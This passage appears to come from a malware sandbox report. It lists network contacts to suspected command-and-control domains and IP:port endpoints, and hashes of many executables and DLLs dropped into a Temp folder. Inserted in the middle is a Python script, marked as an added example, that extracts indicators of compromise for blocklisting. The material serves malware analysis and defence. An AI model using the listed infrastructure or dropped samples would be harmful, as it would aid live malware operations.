| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 216.58.213.1:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | N/A | tcp |
| US | 8.8.8.8:53 | telegka.top | udp |
| FR | 51.178.186.149:80 | N/A | tcp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | 1.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 183.223.178.107.in-addr.arpa | udp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| NL | 194.104.136.5:46013 | N/A | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| FR | 91.121.67.60:2151 | N/A | tcp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 45.9.20.13:80 | N/A | tcp |
| US | 8.8.8.8:53 | 82.190.18.2.in-addr.arpa | udp |
| NL | 194.104.136.5:46013 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| NL | 194.104.136.5:46013 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 104.155.138.21:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | N/A | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 194.104.136.5:46013 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 72.84.118.132:8080 | N/A | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| NL | 194.104.136.5:46013 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| NL | 194.104.136.5:46013 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | N/A | tcp |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.75:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| NL | 194.104.136.5:46013 | N/A | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| NL | 194.104.136.5:46013 | N/A | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 104.155.138.21:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | N/A | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| FR | 91.121.67.60:2151 | N/A | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | N/A | tcp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | N/A | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | telegin.top | udp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | N/A | tcp |
| US | 8.8.8.8:53 | telegin.top | udp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | N/A | tcp |
| US | 8.8.8.8:53 | telegin.top | udp |
| NL | 194.104.136.5:46013 | N/A | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | N/A | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | N/A | tcp |
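The Network table above mixes the sandbox's own DNS queries, reverse lookups and vendor infrastructure (Google client traffic, OCSP responders) in with the sample's real contact points, and some rows have the protocol shifted into the Domain column. The Python script below is added here as a worked example; it is not part of the report or of the sandbox tooling. It turns rows of this shape into a deduplicated IOC list: a row against the 8.8.8.8:53 resolver contributes the queried name rather than the resolver address, reverse-lookup names and allowlisted vendor suffixes are dropped, loopback and multicast targets are ignored, and direct connections that carry no name are kept as raw endpoints (the ones most likely to be hard-coded C2). SAMPLE_ROWS is a constructed subset of the rows above, and BENIGN_SUFFIXES is an analyst-chosen allowlist; both are assumptions of this example, not statements from the report.

```python
"""Pull actionable network IOCs out of a sandbox report's Network table.
Added example, not part of the report. SAMPLE_ROWS is a constructed subset
of the report's rows; BENIGN_SUFFIXES is an analyst-chosen allowlist."""
import ipaddress
from dataclasses import dataclass, field

RESOLVER = "8.8.8.8:53"  # sandbox DNS resolver: rows against it are queries, not C2
BENIGN_SUFFIXES = (      # assumption: vendor traffic seen in nearly every Windows run
    ".google.com", ".googleapis.com", ".googleusercontent.com",
    ".pki.goog", ".lencr.org",
)

SAMPLE_ROWS = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | marianu.xyz | udp |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| GB | 172.217.16.227:80 | c.pki.goog | tcp |
| N/A | 127.0.0.1:54599 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | telegatt.top | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| FR | 91.121.67.60:2151 | N/A | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp |
"""


@dataclass
class Iocs:
    domains: set = field(default_factory=set)           # names resolved or contacted
    raw_endpoints: set = field(default_factory=set)     # ip:port reached with no name
    resolved_endpoints: dict = field(default_factory=dict)  # ip:port -> name used


def parse_row(line):
    """Split one table row into (country, destination, domain, proto).
    Tolerates rows whose Domain cell is empty with the protocol shifted one
    column left, and rows that use the report's N/A placeholder."""
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    cells = [c for c in cells if c]
    if len(cells) < 3 or cells[0] == "Country":
        return None
    country, dest = cells[0], cells[1]
    if cells[2].lower() in ("tcp", "udp"):
        domain, proto = "", cells[2].lower()
    else:
        domain = "" if cells[2].upper() == "N/A" else cells[2].lower()
        proto = cells[3].lower() if len(cells) > 3 else ""
    return country, dest, domain, proto


def is_noise_domain(domain):
    """Reverse lookups and allowlisted vendor names are not indicators."""
    if domain.endswith(".in-addr.arpa"):
        return True
    return any(domain == s.lstrip(".") or domain.endswith(s) for s in BENIGN_SUFFIXES)


def is_noise_endpoint(dest):
    """Loopback, multicast, link-local and RFC1918 targets are sandbox-internal."""
    host = dest.rsplit(":", 1)[0]
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True
    return ip.is_loopback or ip.is_multicast or ip.is_link_local or ip.is_private


def extract_iocs(table_text):
    iocs = Iocs()
    for line in table_text.splitlines():
        row = parse_row(line) if line.lstrip().startswith("|") else None
        if row is None:
            continue
        _country, dest, domain, _proto = row
        if dest == RESOLVER:
            # DNS query: the looked-up name is the indicator, the resolver is not
            if domain and not is_noise_domain(domain):
                iocs.domains.add(domain)
            continue
        if is_noise_endpoint(dest):
            continue
        if not domain:
            iocs.raw_endpoints.add(dest)
        elif not is_noise_domain(domain):
            iocs.domains.add(domain)
            iocs.resolved_endpoints[dest] = domain
    return iocs


def as_lines(iocs):
    """Flat, sorted list ready for a blocklist or a hunt query."""
    lines = [f"domain {d}" for d in sorted(iocs.domains)]
    lines += [f"ip {e}" for e in sorted(iocs.raw_endpoints)]
    lines += [f"ip {e} via {d}" for e, d in sorted(iocs.resolved_endpoints.items())]
    return lines


if __name__ == "__main__":
    print("\n".join(as_lines(extract_iocs(SAMPLE_ROWS))))
```

Run against the full table, the raw endpoints that recur every few seconds (the :4805, :46013 and :2151 connections) stand out as beaconing candidates even though no name was ever resolved for them, which is the kind of signal that gets lost when the whole table is pasted into a blocklist unfiltered.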
Files
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe
| MD5 | c10ba859e90df8a8d8e7dcc8dfe5ac20 |
| SHA1 | 92d43cc9db4e8e70d0eaf7f3406bad818f4a27c5 |
| SHA256 | 6c77a4d421de0321d74ec8d3fca02e782ac035ef471b1218471f139557e3a023 |
| SHA512 | 00fd1f5656cac70d0c769c8752d52a46f5ef3f93a10ee87f5e8ee63edd20e2d9c22cbf4f6123a835c701b432527821731e6bbc0b42b0fa5e41a52ca232d28d2a |
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/4712-74-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4712-73-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4712-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe
| MD5 | a2326dff5589a00ed3fd40bc1bd0f037 |
| SHA1 | 66c3727fb030f5e1d931de28374cf20e4693bbf4 |
| SHA256 | 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c |
| SHA512 | fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826 |
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe
| MD5 | c90e5a77dd1e7e03d51988bdb057bd9f |
| SHA1 | 498bd4b07d9e11133943e63c2cf06e28d9e99fc5 |
| SHA256 | cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54 |
| SHA512 | bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34 |
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c9e031f4.exe
| MD5 | 0b67130e7f04d08c78cb659f54b20432 |
| SHA1 | 669426ae83c4a8eacf207c7825168aca30a37ca2 |
| SHA256 | bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac |
| SHA512 | 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79 |
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19ac3c92c21.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
memory/1764-91-0x0000000002430000-0x0000000002466000-memory.dmp
memory/2452-92-0x00000000734C0000-0x0000000073C70000-memory.dmp
memory/1764-93-0x0000000004EF0000-0x0000000005518000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19b4b38a7569a9.exe
| MD5 | 26278caf1df5ef5ea045185380a1d7c9 |
| SHA1 | df16e31d1dd45dc4440ec7052de2fc026071286c |
| SHA256 | d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5 |
| SHA512 | 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03 |
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cd42a7c874e44.exe
| MD5 | 0c4602580c43df3321e55647c7c7dfdb |
| SHA1 | 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1 |
| SHA256 | fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752 |
| SHA512 | 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11 |
memory/2600-99-0x0000000000D20000-0x0000000000D38000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue197e9ec0ff0.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lcwwkdu1.p22.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3180-136-0x0000000004880000-0x000000000489E000-memory.dmp
memory/1032-135-0x0000000000040000-0x00000000000B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c28f648204dbd4.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe
| MD5 | a4bf9671a96119f7081621c2f2e8807d |
| SHA1 | 47f50ae20bfa8b277f8c8c1963613d3f4c364b94 |
| SHA256 | d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7 |
| SHA512 | f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a |
memory/2452-137-0x0000000005660000-0x00000000059B4000-memory.dmp
memory/1560-112-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe
| MD5 | 21a61f35d0a76d0c710ba355f3054c34 |
| SHA1 | 910c52f268dbbb80937c44f8471e39a461ebe1fe |
| SHA256 | d9c606fa8e99ee0c5e55293a993fb6a69e585a32361d073907a8f8e216d278dd |
| SHA512 | 3f33f07aee83e8d1538e5e3d1b723876ddbecc2a730b8eaf7846522f78f5fc6b65ed23085c3a51e62c91dc80b73c171d8f32c44b92cf144689a834e33ea01b3e |
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe
| MD5 | bf2f6094ceaa5016d7fb5e9e95059b6b |
| SHA1 | 25583e0b5a4e331a0ca97b01c5f4ecf6b2388bad |
| SHA256 | 47f383df5f55f756468fbb141377bed62056d72d933d675b3c3267d7be4b7f12 |
| SHA512 | 11d54869e1690824e74e33ee2e9975d28b77730588dde0eee540eefabdedf46576395301aeb607de2cf009b721172209d66a273ca5e3144061c1bdbe41e03f78 |
memory/3180-108-0x0000000004900000-0x0000000004976000-memory.dmp
memory/2452-103-0x0000000004F40000-0x0000000004FA6000-memory.dmp
memory/2452-101-0x0000000004ED0000-0x0000000004F36000-memory.dmp
memory/3792-124-0x00000000002B0000-0x00000000002B8000-memory.dmp
memory/2452-97-0x0000000004E30000-0x0000000004E52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue192c34b1c2f5.exe
| MD5 | 8b6f3a6e8d9797093a78f0b85da4a1fc |
| SHA1 | 2f8346a3ec3427c5a7681d166501f8f42f620b3b |
| SHA256 | 5f465c9a74f35fef4a66cbf336dc90bed8bc8caf7b51a98cb52406942c05a0e8 |
| SHA512 | c0ad94faa01f5f3fd67a90df327bd0862243c1f335ccf2582f92867f3c751dfdaf73b7e2d86bd494ca1cc8ba199db7964d61493cd37855a35acbfe0256d2f7ef |
memory/3180-107-0x0000000000160000-0x00000000001D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/2600-144-0x0000000001560000-0x0000000001566000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-PHIHL.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/3180-157-0x0000000005150000-0x00000000056F4000-memory.dmp
memory/1900-156-0x0000000000860000-0x00000000008D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cef5687a.exe
| MD5 | c1bc0cca3a8784bbc7d5d3e9e47e6ba4 |
| SHA1 | 500970243e0e1dd57e2aad4f372da395d639b4a3 |
| SHA256 | 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1 |
| SHA512 | 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5 |
memory/1764-75-0x00000000734CE000-0x00000000734CF000-memory.dmp
memory/4712-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4712-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4712-68-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4712-67-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4712-66-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4712-65-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4712-64-0x0000000064940000-0x0000000064959000-memory.dmp
memory/4712-63-0x0000000064941000-0x000000006494F000-memory.dmp
memory/4712-62-0x0000000000EF0000-0x0000000000F7F000-memory.dmp
memory/4712-61-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/4712-59-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4712-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/2232-162-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2268-165-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1560-167-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1764-171-0x0000000005E00000-0x0000000005E4C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-7CCLN.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Tue19d1fc7d2654d7a.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/2996-185-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1764-169-0x0000000005D60000-0x0000000005D7E000-memory.dmp
memory/2996-192-0x0000000005130000-0x000000000516C000-memory.dmp
memory/4712-201-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4712-203-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4712-202-0x0000000064940000-0x0000000064959000-memory.dmp
memory/4712-198-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/4712-194-0x0000000000400000-0x000000000051C000-memory.dmp
memory/4712-200-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2104-208-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2996-191-0x0000000005200000-0x000000000530A000-memory.dmp
memory/2996-187-0x0000000004F90000-0x0000000004FA2000-memory.dmp
memory/2996-186-0x0000000005500000-0x0000000005B18000-memory.dmp
memory/4504-190-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1764-223-0x0000000006D00000-0x0000000006D1E000-memory.dmp
memory/1764-212-0x000000006C870000-0x000000006C8BC000-memory.dmp
memory/1764-224-0x0000000006D30000-0x0000000006DD3000-memory.dmp
memory/1764-210-0x0000000006CC0000-0x0000000006CF2000-memory.dmp
memory/2452-226-0x000000006C870000-0x000000006C8BC000-memory.dmp
memory/1764-236-0x00000000076C0000-0x0000000007D3A000-memory.dmp
memory/1764-237-0x0000000007080000-0x000000000709A000-memory.dmp
memory/1764-238-0x0000000007100000-0x000000000710A000-memory.dmp
memory/1764-240-0x00000000072F0000-0x0000000007386000-memory.dmp
memory/4088-239-0x0000000000400000-0x0000000002F02000-memory.dmp
memory/1764-241-0x0000000007280000-0x0000000007291000-memory.dmp
memory/2452-243-0x00000000734C0000-0x0000000073C70000-memory.dmp
memory/1764-242-0x00000000734CE000-0x00000000734CF000-memory.dmp
memory/2452-244-0x0000000007150000-0x000000000715E000-memory.dmp
memory/1764-255-0x00000000072C0000-0x00000000072D4000-memory.dmp
memory/1764-256-0x00000000073B0000-0x00000000073CA000-memory.dmp
memory/1764-257-0x00000000073A0000-0x00000000073A8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 737957f82423638932969119b193b62e |
| SHA1 | d4175a6d4e0de1b5d8a0e86eeac912dd040f66df |
| SHA256 | 6a7cc33e32c35b26cad3829ec311dc6dfaaef431454f7bbb6019f18ba81c6510 |
| SHA512 | c58c3705d735e3d60b5e3b85e4908db69d2255d6b33a039ed912eefc018c2abf253752cb630b836715a58b8f2d4954b26e3a1ea0666f145c49d4f6fdb367dfdf |
memory/2452-263-0x00000000734C0000-0x0000000073C70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\rqC~~.A
